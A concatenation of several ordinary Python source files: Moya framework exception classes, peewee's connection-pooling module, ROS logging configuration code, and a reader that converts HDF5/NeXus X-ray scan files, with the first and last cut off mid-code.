self.col = col
self.code = code
def render(self, colour=False):
line, col = self.position
lines = self.code.replace("\t", " " * 4).splitlines()
start = max(0, line - 3)
end = min(len(lines), line + 2)
showlines = lines[start:end]
linenos = [str(n + 1) for n in range(start, end)]
maxline = max(len(l) for l in linenos)
errorlines = []
highlight_line = str(line)
for lineno, line in zip(linenos, showlines):
if lineno == highlight_line:
fmt = "*%s %s"
else:
fmt = " %s %s"
errorlines.append(fmt % (lineno.ljust(maxline), line))
print("\n".join(errorlines))
@implements_to_string
class DocumentError(MoyaError):
"""Raised when there is an error constructing the document"""
def __init__(self, element, msg=""):
super(DocumentError, self).__init__()
self.element = element
self.msg = msg
def __repr__(self):
return "%s in %s" % (self.msg, self.element)
class AttributeError(MoyaError):
"""An attribute related parse error"""
hide_py_traceback = True
error_type = "Attribute error"
class BadValueError(MoyaError):
hide_py_traceback = True
error_type = "Invalid attribute error"
@implements_to_string
class ElementError(MoyaError):
error_type = "Element error"
hide_py_traceback = True
def __init__(self, msg=None, element=None, diagnosis=None):
self.msg = msg
self.element = element
self.diagnosis = diagnosis
super(ElementError, self).__init__(msg)
@property
def source_line(self):
if self.element:
return getattr(self.element, "source_line", None)
return None
def get_message(self):
if self.element is None:
return self.msg
# path = self.element._document.path
# line = self.element.source_line or '?'
return "in {}, {}".format(self.element, self.msg)
# return 'Document "%s", line %s, in <%s>: %s' % (path,
# line,
# self.element._tag_name,
# self.msg)
def __str__(self):
return text_type(self.get_message())
class ContentError(ElementError):
error_type = "Content Error"
class ElementNotFoundError(MoyaError):
default_message = "element '{elementref}' was not found in the project"
hide_py_traceback = True
error_type = "Element not found error"
def __init__(self, elementref, app=None, lib=None, msg=None, reason=None):
if isinstance(elementref, tuple):
xmlns, ref = elementref
elementref = "{{" + xmlns + "}}" + ref
self.elementref = elementref
self.app = app
self.lib = lib
diagnosis = None
if msg is None:
if self.elementref and "#" not in self.elementref:
diagnosis = """\
Did you mean **"#{elementref}"** ?
Without the '#' symbol, Moya will look for the element with **docname="{elementref}"** in the current *file*.
Add a # if you meant to reference an element in the current *application*.
""".format(
elementref=self.elementref
)
if app or lib:
msg = "unable to reference element '{elementref}' in {obj}".format(
elementref=self.elementref, obj=self.app or self.lib
)
else:
msg = "unable to reference element '{elementref}'".format(
elementref=self.elementref
)
else:
msg = msg.replace("{", "{{").replace("}", "}}")
if reason is not None:
msg = "{} ({})".format(msg, reason)
super(ElementNotFoundError, self).__init__(
msg, elementref=elementref, diagnosis=diagnosis
)
# def get_message(self):
# if not (self.app or self.lib):
# return super(ElementNotFoundError, self).get_message()
# return "element '{elementref}' not found in {obj}".format(elementref=self.elementref,
# obj=self.app or self.lib)
class UnknownLibraryError(MoyaError):
default_message = "library '{lib}' must be imported before it can be installed"
hide_py_traceback = True
error_type = "Library not imported error"
def __init__(self, lib):
self.lib = lib
super(UnknownLibraryError, self).__init__(lib=lib)
class UnknownElementError(MoyaError):
default_message = "element {{{xmlns}}}{element} is not recognized"
def __init__(self, xmlns, element, source_line=None):
self.xmlns = xmlns
self.element = element
self.source_line = source_line
super(UnknownElementError, self).__init__(xmlns=xmlns, element=element)
class AmbiguousFilterError(MoyaError):
default_message = "filter is ambigious"
class UnknownFilterError(MoyaError):
default_message = "no such filter"
class AttributeTypeError(MoyaError):
"""An error caused by an attribute containing the wrong type of data"""
def __init__(self, element, name, value, type_name):
self.element = element
self.name = name
self.type_name = type_name
self.value = value
msg = "%r attribute should be a valid %s (not %r)" % (name, type_name, value)
super(AttributeTypeError, self).__init__(msg)
class ContextError(MoyaError):
pass
class LibraryLoadError(MoyaError):
"""Raised when a lib could not be read"""
hide_py_traceback = True
default_message = "Unable to load library '{lib}'"
message = "Unable to load library '{lib}' - {error}"
def __init__(self, error, lib=None, py_exception=None, **kwargs):
long_name = getattr(lib, "long_name", None)
if long_name is None:
lib = "<unknown>"
else:
lib = long_name
self.lib = lib
self.py_exception = py_exception
super(LibraryLoadError, self).__init__(error, lib=lib, **kwargs)
class StartupFailedError(MoyaError):
pass
class SettingsError(StartupFailedError):
pass
class LoggingSettingsError(StartupFailedError):
pass
class AppError(MoyaError):
hide_py_traceback = True
error_type = "Application Error"
class AmbiguousAppError(AppError):
default_message = (
"More than one app installed for lib '{lib_name}', choices are {apps}"
)
def __init__(self, lib_name, apps):
self.lib_name = lib_name
self.apps = apps
super(AmbiguousAppError, self).__init__(
lib_name=lib_name, apps=textual_list(apps)
)
class AppRequiredError(AppError):
default_message = "No application installed for lib '{lib}'"
def __init__(self, lib):
super(AppRequiredError, self).__init__(lib=lib)
class AppMissingError(AppError):
default_message = "A value for application is required"
class UnknownAppError(AppError):
default_message = "No app in the project referenced by '{app}'"
class MarkupError(Exception):
"""Unable to render markup"""
|
|
"""
Lightweight connection pooling for peewee.
In a multi-threaded application, up to `max_connections` will be opened. Each
thread (or, if using gevent, greenlet) will have its own connection.
In a single-threaded application, only one connection will be created. It will
be continually recycled until either it exceeds the stale timeout or is closed
explicitly (using `.manual_close()`).
By default, all your application needs to do is ensure that connections are
closed when you are finished with them, and they will be returned to the pool.
For web applications, this typically means that at the beginning of a request,
you will open a connection, and when you return a response, you will close the
connection.
Simple Postgres pool example code:
# Use the special postgresql extensions.
from playhouse.pool import PooledPostgresqlExtDatabase
db = PooledPostgresqlExtDatabase(
'my_app',
max_connections=32,
stale_timeout=300, # 5 minutes.
user='postgres')
class BaseModel(Model):
class Meta:
database = db
That's it!
"""
import heapq
import logging
import time
from collections import namedtuple
from itertools import chain
try:
from psycopg2.extensions import TRANSACTION_STATUS_IDLE
from psycopg2.extensions import TRANSACTION_STATUS_INERROR
from psycopg2.extensions import TRANSACTION_STATUS_UNKNOWN
except ImportError:
TRANSACTION_STATUS_IDLE = \
TRANSACTION_STATUS_INERROR = \
TRANSACTION_STATUS_UNKNOWN = None
from peewee import MySQLDatabase
from peewee import PostgresqlDatabase
from peewee import SqliteDatabase
logger = logging.getLogger('peewee.pool')
def make_int(val):
if val is not None and not isinstance(val, (int, float)):
return int(val)
return val
class MaxConnectionsExceeded(ValueError): pass
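# Book-keeping record for each live connection: 'timestamp' is when the
# connection was originally created and 'checked_out' is when it was last
# handed out to a caller.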
PoolConnection = namedtuple('PoolConnection', ('timestamp', 'connection',
'checked_out'))
class PooledDatabase(object):
def __init__(self, database, max_connections=20, stale_timeout=None,
timeout=None, **kwargs):
self._max_connections = make_int(max_connections)
self._stale_timeout = make_int(stale_timeout)
self._wait_timeout = make_int(timeout)
if self._wait_timeout == 0:
self._wait_timeout = float('inf')
# Available / idle connections stored in a heap, sorted oldest first.
self._connections = []
# Mapping of connection id to PoolConnection. Ordinarily we would want
# to use something like a WeakKeyDictionary, but Python typically won't
# allow us to create weak references to connection objects.
self._in_use = {}
# Use the memory address of the connection as the key in the event the
# connection object is not hashable. Connections will not get
# garbage-collected, however, because a reference to them will persist
# in "_in_use" as long as the conn has not been closed.
self.conn_key = id
super(PooledDatabase, self).__init__(database, **kwargs)
def init(self, database, max_connections=None, stale_timeout=None,
timeout=None, **connect_kwargs):
super(PooledDatabase, self).init(database, **connect_kwargs)
if max_connections is not None:
self._max_connections = make_int(max_connections)
if stale_timeout is not None:
self._stale_timeout = make_int(stale_timeout)
if timeout is not None:
self._wait_timeout = make_int(timeout)
if self._wait_timeout == 0:
self._wait_timeout = float('inf')
def connect(self, reuse_if_open=False):
if not self._wait_timeout:
return super(PooledDatabase, self).connect(reuse_if_open)
expires = time.time() + self._wait_timeout
while expires > time.time():
try:
ret = super(PooledDatabase, self).connect(reuse_if_open)
except MaxConnectionsExceeded:
time.sleep(0.1)
else:
return ret
raise MaxConnectionsExceeded('Max connections exceeded, timed out '
'attempting to connect.')
def _connect(self):
while True:
try:
# Remove the oldest connection from the heap.
ts, conn = heapq.heappop(self._connections)
key = self.conn_key(conn)
except IndexError:
ts = conn = None
logger.debug('No connection available in pool.')
break
else:
if self._is_closed(conn):
                    # This connection was closed, but since it was not stale
# it got added back to the queue of available conns. We
# then closed it and marked it as explicitly closed, so
# it's safe to throw it away now.
# (Because Database.close() calls Database._close()).
logger.debug('Connection %s was closed.', key)
ts = conn = None
elif self._stale_timeout and self._is_stale(ts):
# If we are attempting to check out a stale connection,
# then close it. We don't need to mark it in the "closed"
# set, because it is not in the list of available conns
# anymore.
logger.debug('Connection %s was stale, closing.', key)
self._close(conn, True)
ts = conn = None
else:
break
if conn is None:
if self._max_connections and (
len(self._in_use) >= self._max_connections):
raise MaxConnectionsExceeded('Exceeded maximum connections.')
conn = super(PooledDatabase, self)._connect()
ts = time.time()
key = self.conn_key(conn)
logger.debug('Created new connection %s.', key)
self._in_use[key] = PoolConnection(ts, conn, time.time())
return conn
def _is_stale(self, timestamp):
# Called on check-out and check-in to ensure the connection has
# not outlived the stale timeout.
return (time.time() - timestamp) > self._stale_timeout
def _is_closed(self, conn):
return False
def _can_reuse(self, conn):
# Called on check-in to make sure the connection can be re-used.
return True
def _close(self, conn, close_conn=False):
key = self.conn_key(conn)
if close_conn:
super(PooledDatabase, self)._close(conn)
elif key in self._in_use:
pool_conn = self._in_use.pop(key)
if self._stale_timeout and self._is_stale(pool_conn.timestamp):
logger.debug('Closing stale connection %s.', key)
super(PooledDatabase, self)._close(conn)
elif self._can_reuse(conn):
logger.debug('Returning %s to pool.', key)
heapq.heappush(self._connections, (pool_conn.timestamp, conn))
else:
logger.debug('Closed %s.', key)
def manual_close(self):
"""
Close the underlying connection without returning it to the pool.
"""
if self.is_closed():
return False
# Obtain reference to the connection in-use by the calling thread.
conn = self.connection()
# A connection will only be re-added to the available list if it is
# marked as "in use" at the time it is closed. We will explicitly
# remove it from the "in use" list, call "close()" for the
# side-effects, and then explicitly close the connection.
self._in_use.pop(self.conn_key(conn), None)
self.close()
self._close(conn, close_conn=True)
def close_idle(self):
# Close any open connections that are not currently in-use.
with self._lock:
for _, conn in self._connections:
self._close(conn, close_conn=True)
self._connections = []
def close_stale(self, age=600):
# Close any connections that are in-use but were checked out quite some
# time ago and can be considered stale.
with self._lock:
in_use = {}
cutoff = time.time() - age
n = 0
for key, pool_conn in self._in_use.items():
if pool_conn.checked_out < cutoff:
self._close(pool_conn.connection, close_conn=True)
n += 1
else:
in_use[key] = pool_conn
self._in_use = in_use
return n
def close_all(self):
# Close all connections -- available and in-use. Warning: may break any
# active connections used by other threads.
self.close()
with self._lock:
for _, conn in self._connections:
self._close(conn, close_conn=True)
for pool_conn in self._in_use.values():
self._close(pool_conn.connection, close_conn=True)
self._connections = []
self._in_use = {}
class PooledMySQLDatabase(PooledDatabase, MySQLDatabase):
def _is_closed(self, conn):
try:
conn.ping(False)
except:
return True
else:
return False
class _PooledPostgresqlDatabase(PooledDatabase):
def _is_closed(self, conn):
if conn.closed:
return True
txn_status = conn.get_transaction_status()
if txn_status == TRANSACTION_STATUS_UNKNOWN:
return True
elif txn_status != TRANSACTION_STATUS_IDLE:
conn.rollback()
return False
def _can_reuse(self, conn):
txn_status = conn.get_transaction_status()
# Do not return connection in an error state, as subsequent queries
# will all fail. If the status is unknown then we lost the connection
# to the server and the connection should not be re-used.
if txn_status == TRANSACTION_STATUS_UNKNOWN:
return False
elif txn_status == TRANSACTION_STATUS_INERROR:
conn.reset()
elif txn_status != TRANSACTION_STATUS_IDLE:
conn.rollback()
return True
class PooledPostgresqlDatabase(_PooledPostgresqlDatabase, PostgresqlDatabase):
pass
try:
from playhouse.postgres_ext import PostgresqlExtDatabase
class PooledPostgresqlExtDatabase(_PooledPostgresqlDatabase, PostgresqlExtDatabase):
pass
except ImportError:
PooledPostgresqlExtDatabase = None
class _PooledSqliteDatabase(PooledDatabase):
def _is_closed(self, conn):
try:
conn.total_changes
except:
return True
else:
return False
class PooledSqliteDatabase(_PooledSqliteDatabase, SqliteDatabase):
pass
try:
from playhouse.sqlite_ext import SqliteExtDatabase
class PooledSqliteExtDatabase(_PooledSqliteDatabase, SqliteExtDatabase):
pass
except ImportError:
PooledSqliteExtDatabase = None
try:
from playhouse.sqlite_ext import CSqliteExtDatabase
class PooledCSqliteExtDatabase(_PooledSqliteDatabase, CSqliteExtDatabase):
pass
except ImportError:
PooledCSqliteExtDatabase = None
|
|
# Software License Agreement (BSD License)
#
# Copyright (c) 2008, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
Library for configuring python logging to standard ROS locations (e.g. ROS_LOG_DIR).
"""
import os
import sys
import time
import logging
import logging.config
import inspect
import yaml
import rospkg
from rospkg.environment import ROS_LOG_DIR
class LoggingException(Exception): pass
class RospyLogger(logging.getLoggerClass()):
def findCaller(self, dummy=False): # Dummy second arg to match Python3 function declaration
"""
Find the stack frame of the caller so that we can note the source
file name, line number, and function name with class name if possible.
"""
file_name, lineno, func_name = super(RospyLogger, self).findCaller()[:3]
file_name = os.path.normcase(file_name)
f = inspect.currentframe()
if f is not None:
f = f.f_back
while hasattr(f, "f_code"):
# Search for the right frame using the data already found by parent class.
co = f.f_code
filename = os.path.normcase(co.co_filename)
if filename == file_name and f.f_lineno == lineno and co.co_name == func_name:
break
f = f.f_back
# Jump up two more frames, as the logger methods have been double wrapped.
if f.f_back and f.f_code and f.f_code.co_name == '_base_logger':
f = f.f_back
if f.f_back:
f = f.f_back
co = f.f_code
func_name = co.co_name
# Now extend the function name with class name, if available.
try:
class_name = f.f_locals['self'].__class__.__name__
func_name = '%s.%s' % (class_name, func_name)
except KeyError: # if the function is unbound, there is no self.
pass
if sys.version_info > (3, 2):
# Dummy last argument to match Python3 return type
return co.co_filename, f.f_lineno, func_name, None
else:
return co.co_filename, f.f_lineno, func_name
logging.setLoggerClass(RospyLogger)
def renew_latest_logdir(logfile_dir):
log_dir = os.path.dirname(logfile_dir)
latest_dir = os.path.join(log_dir, 'latest')
if os.path.lexists(latest_dir):
if not os.path.islink(latest_dir):
return False
os.remove(latest_dir)
os.symlink(logfile_dir, latest_dir)
return True
def configure_logging(logname, level=logging.INFO, filename=None, env=None):
"""
Configure Python logging package to send log files to ROS-specific log directory
:param logname str: name of logger, ``str``
:param filename: filename to log to. If not set, a log filename
will be generated using logname, ``str``
:param env: override os.environ dictionary, ``dict``
:returns: log file name, ``str``
:raises: :exc:`LoggingException` If logging cannot be configured as specified
"""
if env is None:
env = os.environ
logname = logname or 'unknown'
log_dir = rospkg.get_log_dir(env=env)
# if filename is not explicitly provided, generate one using logname
if not filename:
log_filename = os.path.join(log_dir, '%s-%s.log'%(logname, os.getpid()))
else:
log_filename = os.path.join(log_dir, filename)
logfile_dir = os.path.dirname(log_filename)
if not os.path.exists(logfile_dir):
try:
makedirs_with_parent_perms(logfile_dir)
except OSError:
# cannot print to screen because command-line tools with output use this
if os.path.exists(logfile_dir):
# We successfully created the logging folder, but could not change
# permissions of the new folder to the same as the parent folder
sys.stderr.write("WARNING: Could not change permissions for folder [%s], make sure that the parent folder has correct permissions.\n"%logfile_dir)
else:
# Could not create folder
sys.stderr.write("WARNING: cannot create log directory [%s]. Please set %s to a writable location.\n"%(logfile_dir, ROS_LOG_DIR))
return None
elif os.path.isfile(logfile_dir):
raise LoggingException("Cannot save log files: file [%s] is in the way"%logfile_dir)
# the log dir itself should not be symlinked as latest
if logfile_dir != log_dir:
if sys.platform not in ['win32']:
try:
success = renew_latest_logdir(logfile_dir)
if not success:
sys.stderr.write("INFO: cannot create a symlink to latest log directory\n")
except OSError as e:
sys.stderr.write("INFO: cannot create a symlink to latest log directory: %s\n" % e)
config_file = os.environ.get('ROS_PYTHON_LOG_CONFIG_FILE')
if not config_file:
# search for logging config file in ROS_HOME, ROS_ETC_DIR or relative
# to the rosgraph package directory.
rosgraph_d = rospkg.RosPack().get_path('rosgraph')
for config_dir in [os.path.join(rospkg.get_ros_home(), 'config'),
rospkg.get_etc_ros_dir(),
os.path.join(rosgraph_d, 'conf')]:
for extension in ('conf', 'yaml'):
f = os.path.join(config_dir,
'python_logging{}{}'.format(os.path.extsep,
extension))
if os.path.isfile(f):
config_file = f
break
if config_file is not None:
break
if config_file is None or not os.path.isfile(config_file):
# logging is considered soft-fail
sys.stderr.write("WARNING: cannot load logging configuration file, logging is disabled\n")
logging.getLogger(logname).setLevel(logging.CRITICAL)
return log_filename
# pass in log_filename as argument to pylogging.conf
os.environ['ROS_LOG_FILENAME'] = log_filename
if config_file.endswith(('.yaml', '.yml')):
with open(config_file) as f:
dict_conf = yaml.safe_load(f)
dict_conf.setdefault('version', 1)
logging.config.dictConfig(dict_conf)
else:
# #3625: disabling_existing_loggers=False
logging.config.fileConfig(config_file, disable_existing_loggers=False)
return log_filename
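# A hedged usage sketch (assumes this module is importable as
# rosgraph.roslogging and that the ROS log directory is writable;
# 'my_node' is a hypothetical logger name):
#
#     from rosgraph.roslogging import configure_logging
#     log_file = configure_logging('my_node')
#     logging.getLogger('my_node').info('writing log to %s', log_file)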
def makedirs_with_parent_perms(p):
"""
Create the directory using the permissions of the nearest
(existing) parent directory. This is useful for logging, where a
root process sometimes has to log in the user's space.
:param p: directory to create, ``str``
"""
p = os.path.abspath(p)
parent = os.path.dirname(p)
# recurse upwards, checking to make sure we haven't reached the
# top
if not os.path.exists(p) and p and parent != p:
makedirs_with_parent_perms(parent)
s = os.stat(parent)
os.mkdir(p)
# if perms of new dir don't match, set anew
s2 = os.stat(p)
if s.st_uid != s2.st_uid or s.st_gid != s2.st_gid:
os.chown(p, s.st_uid, s.st_gid)
if s.st_mode != s2.st_mode:
os.chmod(p, s.st_mode)
_logging_to_rospy_names = {
'DEBUG': ('DEBUG', '\033[32m'),
'INFO': ('INFO', None),
'WARNING': ('WARN', '\033[33m'),
'ERROR': ('ERROR', '\033[31m'),
'CRITICAL': ('FATAL', '\033[31m')
}
_color_reset = '\033[0m'
_defaultFormatter = logging.Formatter()
class RosStreamHandler(logging.Handler):
def __init__(self, colorize=True, stdout=None, stderr=None):
super(RosStreamHandler, self).__init__()
self._stdout = stdout or sys.stdout
self._stderr = stderr or sys.stderr
self._colorize = colorize
try:
from rospy.rostime import get_time, is_wallclock
self._get_time = get_time
self._is_wallclock = is_wallclock
except ImportError:
self._get_time = None
self._is_wallclock = None
def emit(self, record):
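        # Map the Python logging level to its ROS name/colour and expand the
        # ROSCONSOLE_FORMAT placeholders before writing to stdout or stderr.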
level, color = _logging_to_rospy_names[record.levelname]
record_message = _defaultFormatter.format(record)
msg = os.environ.get(
'ROSCONSOLE_FORMAT', '[${severity}] [${time}]: ${message}')
msg = msg.replace('${severity}', level)
msg = msg.replace('${message}', str(record_message))
msg = msg.replace('${walltime}', '%f' % time.time())
msg = msg.replace('${thread}', str(record.thread))
msg = msg.replace('${logger}', str(record.name))
msg = msg.replace('${file}', str(record.pathname))
msg = msg.replace('${line}', str(record.lineno))
msg = msg.replace('${function}', str(record.funcName))
try:
from rospy import get_name
node_name = get_name()
except ImportError:
node_name = '<unknown_node_name>'
msg = msg.replace('${node}', node_name)
time_str = '%f' % time.time()
if self._get_time is not None and not self._is_wallclock():
time_str += ', %f' % self._get_time()
msg = msg.replace('${time}', time_str)
msg += '\n'
if record.levelno < logging.WARNING:
self._write(self._stdout, msg, color)
else:
self._write(self._stderr, msg, color)
def _write(self, fd, msg, color):
if self._colorize and color and hasattr(fd, 'isatty') and fd.isatty():
msg = color + msg + _color_reset
fd.write(msg)
|
|
'''
Created on May 2014
@author: Mirna Lerotic, 2nd Look Consulting
http://www.2ndlookconsulting.com/
'''
from __future__ import division
import string
import numpy as np
import h5py
import xml.etree.ElementTree as ET
from file_util import call_function_with_retry
class scan:
def __init__(self):
self.scan_name = ''
self.scan_time_stamp = ''
self.mca_calib_arr = [] #mca calibration array
self.mca_calib_description_arr = [] #mca calib description array
self.y_coord_arr = [] #y coordinates in mm
self.x_coord_arr = [] #x coordinates in mm
self.y_pixels = 0 #m pixel
self.x_pixels = 0 #n pixel
self.detector_arr = [] #nxmxo array ( o detectors)
self.detector_description_arr = [] #ox1 array
self.mca_arr = [] #nxmx2000xno.detectors array ( 2000 energies)
self.extra_pv = []
self.extra_pv_key_list = []
# ----------------------------------------------------------------------
class nxs:
def __init__(self, logger):
self.logger = logger
# ----------------------------------------------------------------------
def read_scan(self, filename):
# Open HDF5 file
f = call_function_with_retry(h5py.File, 5, 0.1, 1.1, (filename, 'r'))
        if f is None:
self.logger.error('Error reading %s',filename)
return None
#f = h5py.File(filename, 'r')
if 'entry1' in f:
e1Grp = f['entry1']
if 'xml' in e1Grp:
xmlGrp = e1Grp['xml']
if 'ScanParameters' in xmlGrp:
scanpars = xmlGrp['ScanParameters']
scanpars = scanpars[...]
scanpars = scanpars[0]
root = ET.fromstring(scanpars)
keys = []
values = []
for child_of_root in root:
keys.append(child_of_root.tag.strip())
values.append(child_of_root.text.strip())
dScanPars = dict(zip(keys, values))
#self.logger.debug(dScanPars
if 'OutputParameters' in xmlGrp:
outpars = xmlGrp['OutputParameters']
outpars = outpars[...]
outpars = outpars[0]
root = ET.fromstring(outpars)
keys = []
values = []
for child_of_root in root:
keys.append(child_of_root.tag.strip())
values.append(child_of_root.text.strip())
dOutPars = dict(zip(keys, values))
#self.logger.debug( dOutPars
if 'DetectorParameters' in xmlGrp:
detpars = xmlGrp['DetectorParameters']
detpars = detpars[...]
detpars = detpars[0]
root = ET.fromstring(detpars)
keys = []
values = []
ndetgrp = 1
for child_of_root in root:
if child_of_root.text.strip() != '':
keys.append(child_of_root.tag.strip())
values.append(child_of_root.text.strip())
else:
nionch = 1
apstr1 = ''
if child_of_root.tag.strip() == 'detectorGroup':
apstr1 = str(ndetgrp)
ndetgrp += 1
ndet = 1
for gchild_of_root in child_of_root:
apstr2 = ''
if gchild_of_root.tag.strip() == 'detector':
apstr2 = str(ndet)
ndet += 1
if gchild_of_root.text.strip() != '':
keys.append(child_of_root.tag.strip()+apstr1+'/'+gchild_of_root.tag.strip()+apstr2)
values.append(gchild_of_root.text.strip())
else:
apstr3 = ''
if gchild_of_root.tag.strip() == 'ionChamber':
apstr3 = str(nionch)
nionch += 1
for ggchild_of_root in gchild_of_root:
if ggchild_of_root.text.strip() != '':
keys.append(child_of_root.tag.strip()+'/'+gchild_of_root.tag.strip()+apstr3+'/'+ggchild_of_root.tag.strip())
values.append(ggchild_of_root.text.strip())
dDetPars = dict(zip(keys, values))
#self.logger.debug(dDetPars
if 'SampleParameters' in xmlGrp:
samplepars = xmlGrp['SampleParameters']
samplepars = samplepars[...]
samplepars = samplepars[0]
root = ET.fromstring(samplepars)
keys = []
values = []
for child_of_root in root:
if child_of_root.text.strip() != '':
keys.append(child_of_root.tag.strip())
values.append(child_of_root.text.strip())
else:
for gchild_of_root in child_of_root:
if gchild_of_root.text.strip() != '':
keys.append(child_of_root.tag.strip()+'/'+gchild_of_root.tag.strip())
values.append(gchild_of_root.text.strip())
dSamlePars = dict(zip(keys, values))
#self.logger.debug(dSamlePars
if 'xmapMca' in e1Grp:
xmapmcaGrp = e1Grp['xmapMca']
if 'allElementSum' in xmapmcaGrp:
allElementSum = xmapmcaGrp['allElementSum']
allElementSum = allElementSum[...]
if 'fullSpectrum' in xmapmcaGrp:
fullSpectrum = xmapmcaGrp['fullSpectrum']
fullSpectrum = fullSpectrum[...]
if 'icr' in xmapmcaGrp:
icr = xmapmcaGrp['icr']
icr = icr[...]
if 'ocr' in xmapmcaGrp:
ocr = xmapmcaGrp['ocr']
ocr = ocr[...]
if 'realX' in xmapmcaGrp:
realX = xmapmcaGrp['realX']
realX = realX[...]
if 'sc_MicroFocusSampleY' in xmapmcaGrp:
sc_MicroFocusSampleY = xmapmcaGrp['sc_MicroFocusSampleY']
sc_MicroFocusSampleY = sc_MicroFocusSampleY[...]
# Close
f.close()
scan_data = scan()
scan_data.scan_name = 'DLS Scan'
scan_data.scan_time_stamp = ' '
# create mca calib description array
scan_data.mca_calib_description_arr = []
# create mca calibration array
scan_data.mca_calib_arr = np.zeros((fullSpectrum.shape[2]))
scan_data.x_pixels = fullSpectrum.shape[0]
scan_data.x_coord_arr = realX
scan_data.y_pixels = fullSpectrum.shape[1]
scan_data.y_coord_arr = sc_MicroFocusSampleY
#detector_arr = fltarr(x_pixels, y_pixels, info.no_detectors)
scan_data.detector_arr = np.zeros((fullSpectrum.shape[0],fullSpectrum.shape[1],fullSpectrum.shape[2]))
scan_data.detector_description_arr = []
#mca_arr = fltarr(x_pixels, y_pixels, no_energy_channels, info.no_detectors)
scan_data.mca_arr = fullSpectrum
return scan_data
#----------------------------------------------------------------------
def convert_nxs_to_h5(self, nfilename, hfilename, overwrite = True):
# Open HDF5 file
f = call_function_with_retry(h5py.File, 5, 0.1, 1.1, (nfilename, 'r'))
        if f is None:
self.logger.error('Error reading %s', nfilename)
return None
#f = h5py.File(nfilename, 'r')
if 'entry1' in f:
e1Grp = f['entry1']
if 'xml' in e1Grp:
xmlGrp = e1Grp['xml']
if 'ScanParameters' in xmlGrp:
scanpars = xmlGrp['ScanParameters']
scanpars = scanpars[...]
scanpars = scanpars[0]
root = ET.fromstring(scanpars)
keys = []
values = []
for child_of_root in root:
keys.append(child_of_root.tag.strip())
values.append(child_of_root.text.strip())
dScanPars = dict(zip(keys, values))
#self.logger.debug(dScanPars
if 'OutputParameters' in xmlGrp:
outpars = xmlGrp['OutputParameters']
outpars = outpars[...]
outpars = outpars[0]
root = ET.fromstring(outpars)
keys = []
values = []
for child_of_root in root:
keys.append(child_of_root.tag.strip())
values.append(child_of_root.text.strip())
dOutPars = dict(zip(keys, values))
#self.logger.debug(dOutPars
if 'DetectorParameters' in xmlGrp:
detpars = xmlGrp['DetectorParameters']
detpars = detpars[...]
detpars = detpars[0]
root = ET.fromstring(detpars)
keys = []
values = []
ndetgrp = 1
for child_of_root in root:
if child_of_root.text.strip() != '':
keys.append(child_of_root.tag.strip())
values.append(child_of_root.text.strip())
else:
nionch = 1
apstr1 = ''
if child_of_root.tag.strip() == 'detectorGroup':
apstr1 = str(ndetgrp)
ndetgrp += 1
ndet = 1
for gchild_of_root in child_of_root:
apstr2 = ''
if gchild_of_root.tag.strip() == 'detector':
apstr2 = str(ndet)
ndet += 1
if gchild_of_root.text.strip() != '':
keys.append(child_of_root.tag.strip()+apstr1+'/'+gchild_of_root.tag.strip()+apstr2)
values.append(gchild_of_root.text.strip())
else:
apstr3 = ''
if gchild_of_root.tag.strip() == 'ionChamber':
apstr3 = str(nionch)
nionch += 1
for ggchild_of_root in gchild_of_root:
if ggchild_of_root.text.strip() != '':
keys.append(child_of_root.tag.strip()+'/'+gchild_of_root.tag.strip()+apstr3+'/'+ggchild_of_root.tag.strip())
values.append(ggchild_of_root.text.strip())
dDetPars = dict(zip(keys, values))
#self.logger.debug(dDetPars
if 'SampleParameters' in xmlGrp:
samplepars = xmlGrp['SampleParameters']
samplepars = samplepars[...]
samplepars = samplepars[0]
root = ET.fromstring(samplepars)
keys = []
values = []
for child_of_root in root:
if child_of_root.text.strip() != '':
keys.append(child_of_root.tag.strip())
values.append(child_of_root.text.strip())
else:
for gchild_of_root in child_of_root:
if gchild_of_root.text.strip() != '':
keys.append(child_of_root.tag.strip()+'/'+gchild_of_root.tag.strip())
values.append(gchild_of_root.text.strip())
dSamlePars = dict(zip(keys, values))
#self.logger.debug(dSamlePars
if 'xmapMca' in e1Grp:
xmapmcaGrp = e1Grp['xmapMca']
if 'allElementSum' in xmapmcaGrp:
allElementSum = xmapmcaGrp['allElementSum']
allElementSum = allElementSum[...]
if 'fullSpectrum' in xmapmcaGrp:
fullSpectrum = xmapmcaGrp['fullSpectrum']
fullSpectrum = fullSpectrum[...]
if 'icr' in xmapmcaGrp:
icr = xmapmcaGrp['icr']
icr = icr[...]
if 'ocr' in xmapmcaGrp:
ocr = xmapmcaGrp['ocr']
ocr = ocr[...]
if 'realX' in xmapmcaGrp:
realX = xmapmcaGrp['realX']
realX = realX[...]
if 'sc_MicroFocusSampleY' in xmapmcaGrp:
sc_MicroFocusSampleY = xmapmcaGrp['sc_MicroFocusSampleY']
sc_MicroFocusSampleY = sc_MicroFocusSampleY[...]
# Close
f.close()
mca_arr = allElementSum
# set compression level where applicable:
gzip = 5
file_status = 0
entry_exists = 0
verbose = 0
# test whether a file with this filename already exists:
try:
# Open HDF5 file
f = h5py.File(hfilename, 'r')
if verbose:
self.logger.debug('Have HDF5 file: %s', hfilename)
file_exists = 1
file_is_hdf = 1
file_status = 2
